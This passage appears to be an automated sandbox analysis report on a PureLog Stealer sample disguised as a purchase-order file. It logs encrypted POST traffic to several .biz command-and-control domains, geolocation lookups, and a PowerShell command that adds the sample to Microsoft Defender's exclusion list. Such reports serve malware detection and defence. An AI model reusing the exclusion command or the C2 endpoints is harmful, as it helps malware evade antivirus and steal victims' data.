                                                                                                                                                                    Nov 28, 2024 22:44:50.009222031 CET834OUTData Raw: aa e8 e3 01 e7 20 a7 ad 36 03 00 00 e8 a4 2d 31 e9 67 3a 9e ad 35 32 db 03 af 41 46 37 84 37 d9 65 f8 b7 58 25 bb db 62 99 f6 b1 2e af 6e 13 4b 17 8e 32 e7 56 df 4f 13 45 fb e7 65 68 30 e7 72 d0 b9 95 4b 15 7f 43 0e 84 c9 44 69 a1 38 d1 d3 b1 32
                                                                                                                                                                    Data Ascii: 6-1g:52AF77eX%b.nK2VOEeh0rKCDi82;aZmNU0f<h7Nm~)C/&<9|UsT~J':$JHm Rj,@ocpk`&y6eduvT?!Vzr1^@


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.749781172.234.222.138807880C:\Windows\System32\alg.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:44:50.042895079 CET349OUTPOST /hcvpcb HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                    Nov 28, 2024 22:44:50.042912006 CET778OUTData Raw: 8e a6 00 c0 08 c7 35 9a fe 02 00 00 06 44 76 93 76 2d 1f 57 bf fd e6 80 24 51 ec d1 1e d0 14 ed 9e d4 01 dc 4d ac c8 05 8c be 9f e8 87 37 f0 61 fa b0 39 e8 9b a3 00 6f 32 86 c1 f5 05 9b 25 2a a8 55 6e 6c e6 8a b4 29 c1 64 30 ec 2e 23 19 59 f8 fe
                                                                                                                                                                    Data Ascii: 5Dvv-W$QM7a9o2%*Unl)d0.#Y_o3;i)YuDO)rc"beu*qs!>^Nd4i_C =kr1ZG{=yDJ--S-pNwX E-0{\TTV~)/?R


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.749784172.234.222.138807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:44:51.366703033 CET347OUTPOST /lxda HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                    Nov 28, 2024 22:44:51.366833925 CET834OUTData Raw: 03 d0 4c 5c 14 e0 8d 87 36 03 00 00 bb a5 79 ad 37 aa 03 f1 84 a0 4e a4 00 e2 e3 cd 00 4a bb 3b b9 56 f8 77 4e 3d f6 ce c7 f3 4d 36 54 70 bb 1e 1e d7 7b 17 36 e2 72 f7 4d ba d1 a5 dd ea 78 12 14 ee 75 d4 cb 28 b2 61 8a 29 c4 cc 4c b3 52 71 df 5d
                                                                                                                                                                    Data Ascii: L\6y7NJ;VwN=M6Tp{6rMxu(a)LRq]w`'3p`Ud <!bgr]TW5@]ik~1{%NP`Vz,p]g9*k#DTDc9+)rZ]?>c9{bov|GNu&la al#


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.749787172.234.222.138807880C:\Windows\System32\alg.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:44:51.504663944 CET351OUTPOST /lkgggwxh HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                    Nov 28, 2024 22:44:51.504663944 CET778OUTData Raw: 17 41 21 db 4d 09 cd 07 fe 02 00 00 ae 23 4c fb e0 ac a7 f4 07 e0 03 44 9b d2 43 e5 fa 63 df d1 70 5d 17 0d ab 47 5d 47 1b 46 5c 99 cb fc 7d 64 37 bf da 01 ce 98 cd 71 f4 9c a4 b5 2e 90 ea 60 e3 81 a5 75 15 90 b4 ac 57 78 f3 05 89 6b 5a 26 43 81
                                                                                                                                                                    Data Ascii: A!M#LDCcp]G]GF\}d7q.`uWxkZ&C;ce?/(,Sz@QF@U4jtD@w;[G<=Lg^eU<@^gT0g>1Y>Y'"{6(Dxd


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.74980682.112.184.197807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:45:00.638345003 CET350OUTPOST /lsfncqfq HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                    Nov 28, 2024 22:45:00.638411999 CET834OUTData Raw: 67 88 4b 7b b2 2c 0e 61 36 03 00 00 78 9f 10 67 7b f0 4f 7e 91 e9 55 92 13 85 4a 8d cb a3 a8 e2 16 ed 66 d4 31 d8 29 92 19 10 5f 2c dd a3 a5 19 e5 14 67 1c 65 1f ea 1d b5 cd 5e 7b 54 db 3d 61 27 7a f1 23 a8 05 59 3f 1d 03 1f 40 a6 7f d4 be 58 b5
                                                                                                                                                                    Data Ascii: gK{,a6xg{O~UJf1)_,ge^{T=a'z#Y?@XERg_Mj`J39mZh('(_M+D]x0xLk-!k NCHC/P&JA> sV(UM+T91aXZ`+j7s+d;@wIU.jJHv


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.74980882.112.184.197807880C:\Windows\System32\alg.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:45:00.677488089 CET349OUTPOST /algtvyj HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                    Nov 28, 2024 22:45:00.677501917 CET778OUTData Raw: df 19 5b f8 68 f2 b6 72 fe 02 00 00 61 4f a9 ea 07 8e ba fc b6 1a 9d 1b 45 c1 47 3d c6 64 4e 60 34 15 ad 73 63 d5 00 e4 6c 83 44 34 67 02 0e c7 fa 99 48 73 ec ad 8c 0f cb f6 2d ec 1d 06 d2 81 86 d0 9c 6e 81 66 ed 3c 0e a4 92 b2 e3 e4 db 06 6f 12
                                                                                                                                                                    Data Ascii: [hraOEG=dN`4sclD4gHs-nf<o7GZ]caTKB4U~pnrGjnq!UG~Lm^6h;C3')\96Q:*|`]!]/WVS7t 3r_'kA JL


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    10192.168.2.74985282.112.184.197807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:45:22.706005096 CET351OUTPOST /oxlmrobhj HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                    Nov 28, 2024 22:45:22.706033945 CET834OUTData Raw: 08 9c 85 4b 28 f3 a4 ca 36 03 00 00 9c 20 2d b6 37 0f 2b ae 2f 06 ed 15 5c 9f 47 0e d5 3c 88 e8 14 0d 20 04 6c 91 83 9d 2b 12 14 1e 74 6b c1 c4 7f 55 c6 9e fc d0 29 45 fd 2a 1c 66 e0 8b 11 5c 4b 88 37 af 88 d7 52 fa e3 52 4e 4a 4e 59 d9 13 0b f7
                                                                                                                                                                    Data Ascii: K(6 -7+/\G< l+tkU)E*f\K7RRNJNY``ECK.+.WU[ePw'J{s`otskEdfXI6Oqd^Wa[Q_@Zc#O,@'1w=>&"D,IyJ?mM#


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    11192.168.2.74985382.112.184.197807880C:\Windows\System32\alg.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:45:22.716563940 CET350OUTPOST /kpnskvgb HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                    Nov 28, 2024 22:45:22.716583014 CET778OUTData Raw: e7 d6 d4 e9 2d cc de 49 fe 02 00 00 d4 c6 43 56 88 f0 20 4b 48 3e a3 60 4a 3b 20 b0 99 fb 4d 68 72 1d b6 52 02 7d 5c 64 df e0 e9 e5 9c fb 67 2e 62 90 cd 17 a5 df c6 23 01 2b 2c 8b 74 99 3f 57 73 f7 bc f7 cb c8 25 a3 a2 c5 12 95 d9 ed 88 ce a8 50
                                                                                                                                                                    Data Ascii: -ICV KH>`J; MhrR}\dg.b#+,t?Ws%P%qK*n{z80G^P D9j?`0d$Fn/wxY'.)7ZmH$9Ij3H'0D`_\,.G{vbtNa401t7.S#


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    12192.168.2.74986482.112.184.197807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:45:27.728472948 CET357OUTPOST /fmyrcucxukod HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                    Nov 28, 2024 22:45:27.728472948 CET834OUTData Raw: cb b3 13 57 50 47 2e c7 36 03 00 00 62 4d 6f db 41 4f 04 d1 43 7c 38 28 52 97 d6 a8 b2 0b 3a 3f 76 66 d6 a1 40 38 85 41 8a 9c c3 d6 ea 98 e8 5c 31 6a 52 2a c9 49 27 c6 0e 24 2d af 99 03 89 e6 95 4b 35 75 43 de b9 82 29 c2 75 b9 ed 07 d3 88 45 d2
                                                                                                                                                                    Data Ascii: WPG.6bMoAOC|8(R:?vf@8A\1jR*I'$-K5uC)uEcXrr1(!Y4}$_`zW?Ie9)/w,;M[0a2{l m4Cu>6l!IT|z-1j$F?/(!WZ/WCk3gCGW^_}!~M


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    13192.168.2.74990382.112.184.197807880C:\Windows\System32\alg.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:45:45.016161919 CET348OUTPOST /rdl HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                    Nov 28, 2024 22:45:45.016175985 CET778OUTData Raw: e2 f0 33 55 a4 45 a3 f8 fe 02 00 00 fa 1e 25 e5 40 69 62 1f 78 bd 19 db 89 2f 6a e9 63 a4 b8 89 89 31 37 1a cc 84 83 00 70 ce a6 18 af 86 6b bc b9 54 5d b8 17 81 e5 6f c5 b1 aa 65 13 9e 6b ed 4e 8d 5f 9e 5e 89 be b6 cf bd 62 a2 75 ed 7f 59 89 b8
                                                                                                                                                                    Data Ascii: 3UE%@ibx/jc17pkT]oekN_^buYP !L)@&SytJ-{ a,@}.nDd^3 !`DnB}2S9LZ:#.sT.@2V^(s.*N[G'@R


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    14192.168.2.74991182.112.184.197807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:45:49.770873070 CET358OUTPOST /prgqqrrnmmetm HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                    Nov 28, 2024 22:45:49.770898104 CET834OUTData Raw: 6c c7 4d 28 c6 0d c3 31 36 03 00 00 d1 6f e6 92 94 67 7e 7c 97 7b 5a 14 77 19 ec 06 6a 53 56 ca ed d3 bc 69 fe b7 71 80 86 ea d1 30 69 82 65 50 34 37 dc d1 78 1d d1 7a 0b c1 11 cc 3a 9c 7d 05 3a e9 ea 5a 31 1d 43 89 7d c3 0f 9d 1b a4 72 a8 dd 00
                                                                                                                                                                    Data Ascii: lM(16og~|{ZwjSViq0ieP47xz:}:Z1C}r{`jeoLm(E_btCRtf|6~]@{2gc0?7Q\x'[ K6Xjn)zf[`v<kY:]=5^8{$zF~jOz@xpB


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    15192.168.2.74992182.112.184.197807880C:\Windows\System32\alg.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:46:07.082426071 CET351OUTPOST /oitulo HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                    Nov 28, 2024 22:46:07.082452059 CET778OUTData Raw: b5 cf 27 1b 79 20 97 dc fe 02 00 00 6f f5 2d 5a 68 18 c7 e9 0a 5d dd ca f6 76 1a 3b 18 8b 91 0b a7 1d 6f e8 0a d0 64 67 3e 06 cd eb 83 8d 5b 9d 88 cc 07 29 e6 65 98 44 d2 df 6c 82 b4 c7 6c bf f1 5c 45 c6 d0 48 0c c3 29 e2 fc cf 91 08 59 53 92 18
                                                                                                                                                                    Data Ascii: 'y o-Zh]v;odg>[)eDll\EH)YSgA/,|g?j14+:\vy<\r9r-->\7hakJ"J~(Lb?>Z1%+I:o2J24BR'/qnY/=*l,u+


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    16192.168.2.74992247.129.31.212807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:46:14.774070978 CET348OUTPOST /agmjd HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: xlfhhhm.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                    Nov 28, 2024 22:46:14.774086952 CET834OUTData Raw: 54 d7 4b 23 6e c4 0e 80 36 03 00 00 6c a1 35 c2 61 10 f3 42 2a 7b 27 5b 93 4d e6 29 a3 3d 3f 87 56 68 57 53 0c 19 6e df e3 05 1f b9 54 a9 16 a2 97 29 67 92 bf 6d 5e 98 0e d9 2c bf c0 67 26 85 a1 fc c8 52 b4 f3 e8 b5 99 17 84 b6 7c ba c2 51 9a fc
                                                                                                                                                                    Data Ascii: TK#n6l5aB*{'[M)=?VhWSnT)gm^,g&R|QM@XHdh;60zeIvv3i7v4iAq`1:SZ\VFzr*M@C;CH(V,kREz/&KxM#l{r9a1
                                                                                                                                                                    Nov 28, 2024 22:46:16.902856112 CET411INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:46:16 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: btst=cc3e87914c68f68fb88827bb12e1c88d|8.46.123.228|1732830376|1732830376|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.749725104.21.67.1524437796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-11-28 21:44:30 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-11-28 21:44:30 UTC879INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:44:30 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                    Age: 93441
                                                                                                                                                                    Last-Modified: Wed, 27 Nov 2024 19:47:09 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0rkXpOhIe93nRGcflBv9IUNKY6N6ip9NOcRYJjZRjkqYv3jFO0n3XYpqJ8XCtRDguK%2B5yQaT0zLocYnJySJuyDR2pbvcUYHD%2BHY8H8%2BwDUXG8biXHwLtAbYDTst4%2FHzTCmxWwZ%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8e9d8a257aba4414-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1606&rtt_var=874&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1818181&cwnd=159&unsent_bytes=0&cid=fa0d1704966818c6&ts=602&x=0"
                                                                                                                                                                    2024-11-28 21:44:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.749759104.21.67.1524433628C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-11-28 21:44:44 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-11-28 21:44:44 UTC884INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:44:44 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                    Age: 93455
                                                                                                                                                                    Last-Modified: Wed, 27 Nov 2024 19:47:09 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=505adWETdR%2BVY5nfpLNT6aDI40AqN%2F5FUu5JB7JjoSy8hLZoEVARVQlccKvrkVy1oGrsqSAAoOoVTeW3j2eP9OXIgPCN1xLOqG8%2BNYhO7EyzI6fAr8yJe%2F%2FtmnI8jPB5o8%2FYUA6%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8e9d8a7d5b2c0f71-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1653&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1688837&cwnd=250&unsent_bytes=0&cid=d8af582b744f733f&ts=1774&x=0"
                                                                                                                                                                    2024-11-28 21:44:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:16:44:21
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
                                                                                                                                                                    Imagebase:0xe20000
                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                    MD5 hash:06C13587E9A7AF60860CB6E2C4F3A7B2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1457423473.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
                                                                                                                                                                    Imagebase:0x440000
                                                                                                                                                                    File size:433'152 bytes
